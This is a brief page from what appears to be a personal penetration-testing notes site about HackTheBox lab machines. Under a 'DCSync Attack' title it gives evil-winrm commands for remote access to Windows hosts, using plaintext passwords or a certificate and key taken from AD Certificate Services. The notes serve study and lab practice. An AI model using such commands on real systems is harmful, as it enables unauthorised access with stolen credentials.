DCSync Attack

06/02/2023

shuciran

Basic Access

Evil-WinRM to access via port tcp-5985 into a system:

  
evil-winrm -i 10.10.11.158 -u 'nikk37' -p 'get_dem_girls2@yahoo.com'

Examples: [[Forest#^b22389]]

Active Directory Certificate Services

#Note We can extract the .cer and the .key from a .pfx as per the [[Legacy PFX certificate]] guide. If we get a .cer certificate from the /certsrv endpoint on the DC website we can access to it as follows, for more info go to [[WinRM Certificate (password-less) based authentication]]:

  
evil-winrm -S -c certnew.cer -k amanda.key -i 10.10.10.103 -u 'amanda' -p 'Ashare1972'

Examples: Sizzle

12 Active Directory, Lateral Movement

WebShells
FTP (tcp-21)
Reverse Shells
Finding GUID with ipainstaller
Plist Files

exploitation wireless file transfer hackthebox active directory scr windows privesc mobile linux enumeration linux privesc

DCSync Attack

Basic Access

Active Directory Certificate Services

SYSVOL (Groups.xml)

DCSync Attack

Silver Ticket Attack